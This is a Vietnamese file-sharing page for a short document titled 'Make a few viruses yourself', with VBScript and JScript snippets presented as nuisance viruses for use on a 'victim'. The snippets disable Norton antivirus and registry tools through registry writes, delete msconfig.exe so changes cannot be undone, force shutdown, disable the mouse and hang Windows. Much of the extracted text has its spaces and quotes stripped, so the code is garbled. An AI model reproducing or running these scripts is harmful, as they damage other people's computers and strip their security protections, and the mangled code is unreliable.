Danh mục

Tự tạo vài con virus

Số trang: 2      Loại file: doc      Dung lượng: 28.50 KB      Lượt xem: 3      Lượt tải: 0    
10.10.2023

Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặcJavascript rồi:Dưới đây là code của một số con virus nhỏ dưới dạng VBS:1.Không cho victim khởi động máy:Dim wshSet wsh = createobject("wscript.shell")wsh.run "RUNDLL32.EXE user.exe,exitwindows"
Nội dung trích xuất từ tài liệu:
Tự tạo vài con virusTựtạovàiconviruschơi:trangnàyđãđượcđọc lầnChỉvớiNotepadhayWordpadbạnđãcóthểtựtạochomình1chúVirusdướidạngVBSCRIPThoặcJavascriptrồi:DướiđâylàcodecủamộtsốconvirusnhỏdướidạngVBS:1.Khôngchovictimkhởiđộngmáy:DimwshSetwsh=createobject(wscript.shell)wsh.runRUNDLL32.EXEuser.exe,exitwindows2.DisableNAV:DimwshSetwsh=CreateObject(WScript.Shell)s1=HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NortonProgramScheduler\Startwsh.RegWrites1,3,REG_DWORD3.Hiểnthịmộtmessagemỗikhirebootmáy:dimwshSetwsh=CreateObject(WScript.Shell)s1=HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\s2=LegalNoticeCaptions3=LegalNoticeTextwsh.RegWrites1+s2,http://allformy.topcities.comwsh.RegWrites1+s3,Hi!ToilaTrungWKToidentuChip&Kitty.tk4.Hiểnthịmộtdònglệnhkhiclickvàofilehayfolder:setreg=createobject(WScript.shell)reg.regwriteHKEY_CLASSES_ROOT\*\Shell\\,Hi!BandabinhiemWKtuChip&Kitty.tkreg.regwriteHKEY_CLASSES_ROOT\folder\shell\Hi!BandabinhiemWKtuChip&Kitty.tk\,Robinhood5.Làmchocáctròtrênhoạtđộngbìnhthường:DimobjShellSetobjShell=CreateObject(WScript.Shell)s1=HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\s2=Policies\System\DisableRegistryToolsobjShell.RegWrites1+s2,1,REG_DWORDDướidạngJavascipt:varwsh;wsh=newActiveXObject(Wscript.shell);//Winlogonwhenrebootvars1=HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WinLogon\\;vars2=LegalNoticeCaption;vars3=LegalNoticeText;wsh.RegWrite(s1+s2,http://allformy.topcities.com);wsh.RegWrite(s1+s3,Hi!ToilaAnti_Love.ToidentuChip&Kitty.com);//DisableRegistryvars1=HKEY_USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\;vars2=Policies\\System\\DisableRegistryTools;wsh.RegWrite(s1+s2,0,REG_DWORD);//DeletefileMsconfig.exelàmchovictimkhởiđộngtớiRegistryluônvarfso;fso=newActiveXObject(Scripting.FileSystemObject);varfe=fso.getfile(C:\\windows\\msconfig.exe);fe.deletetrue;//DisableMousewsh.run(RUNDLL32.EXEmouse,disable);//Hangupwindowswsh.run(rundll32user,disableoemlayer);

Tài liệu được xem nhiều: